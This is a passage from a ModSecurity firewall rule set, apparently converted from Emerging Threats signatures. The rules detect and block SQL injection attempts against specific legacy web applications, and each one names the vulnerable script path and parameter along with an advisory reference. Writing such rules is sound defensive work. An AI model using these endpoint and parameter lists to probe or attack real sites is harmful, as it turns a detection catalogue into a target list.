Gallery SQL Injection Attempt -- vehiclelistings.asp categoryID_list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007521) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007521,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:sale_type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp sale_type UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007527) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007527,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:stock_number/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp stock_number UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007533) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007533,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:manufacturer/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp manufacturer UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007539) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007539,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:model/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp model UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007545) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007545,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:vehicleID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007551) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007551,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:year/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp year UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007557,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:vin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE SecRule REQUEST_LINE "@contains /vehiclelistings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007563,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21154'" SecRule &TX:'/SQL_INJECTION.*ARGS:listing_price/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp listing_price UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004064) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE SecRule REQUEST_LINE "@contains /includes/rating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004064,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469351/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:rating/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php rating UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004076) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE SecRule REQUEST_LINE "@contains /includes/rating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004076,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469351/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 2z Project SQL Injection Attempt -- rating.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007222) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE SecRule REQUEST_LINE "@contains /admin/edit.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007222,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2853'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 8pixel.net simpleblog SQL Injection Attempt -- edit.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE SecRule REQUEST_LINE "@contains /templates/modif.html" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005062,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0388'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_mod/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE SecRule REQUEST_LINE "@contains /shared/code/cp_authorization.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005578,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22032'" SecRule &TX:'/SQL_INJECTION.*ARGS:xuser_name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_authorization.php xuser_name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE SecRule REQUEST_LINE "@contains /public/code/cp_downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005584,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22032'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_downloads.php did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004534) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE SecRule REQUEST_LINE "@contains /subcat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004534,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3408'" SecRule &TX:'/SQL_INJECTION.*ARGS:cate_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Auction SQL Injection Attempt -- subcat.php cate_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004540) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE SecRule REQUEST_LINE "@contains /view_profile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004540,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3409'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJDating SQL Injection Attempt -- view_profile.php user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004546) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE SecRule REQUEST_LINE "@contains /postingdetails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004546,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3410'" SecRule &TX:'/SQL_INJECTION.*ARGS:postingid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Classifieds SQL Injection Attempt -- postingdetails.php postingid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004551) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE SecRule REQUEST_LINE "@contains /topic_title.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004551,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3411'" SecRule &TX:'/SQL_INJECTION.*ARGS:td_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AJ Forum SQL Injection Attempt -- topic_title.php td_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006824) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE SecRule REQUEST_LINE "@contains /forum2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006824,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:soruid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum2.asp soruid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE SecRule REQUEST_LINE "@contains /kullanicilistesi.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006830,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:ak/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp ak UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006836) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE SecRule REQUEST_LINE "@contains /aramayap.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006836,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:kelimeler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- aramayap.asp kelimeler UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE SecRule REQUEST_LINE "@contains /giris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006842,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullaniciadi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- giris.asp kullaniciadi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE SecRule REQUEST_LINE "@contains /mesajkutum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006848,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:mesajno/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- mesajkutum.asp mesajno UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006854) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE SecRule REQUEST_LINE "@contains /kullanicilistesi.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006854,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:harf/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- kullanicilistesi.asp harf UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006860) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE SecRule REQUEST_LINE "@contains /forum.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006860,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:baslik/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASPMForum SQL Injection Attempt -- forum.asp baslik UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE SecRule REQUEST_LINE "@contains /artreplydelete.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005110,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0341'" SecRule &TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- artreplydelete.asp username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE SecRule REQUEST_LINE "@contains /news_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005169,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3187'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP NEWS SQL Injection Attempt -- news_detail.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE SecRule REQUEST_LINE "@contains /user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005175,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3186'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP EDGE SQL Injection Attempt -- user.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp iPro UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005888,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp iPro UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3062'" SecRule &TX:'/SQL_INJECTION.*ARGS:iPro/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP SiteWare autoDealer SQL Injection Attempt -- detail.asp iPro UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE SecRule REQUEST_LINE "@contains /listpics.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007005,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21279'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ASP ListPics SQL Injection Attempt -- listpics.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE SecRule REQUEST_LINE "@contains 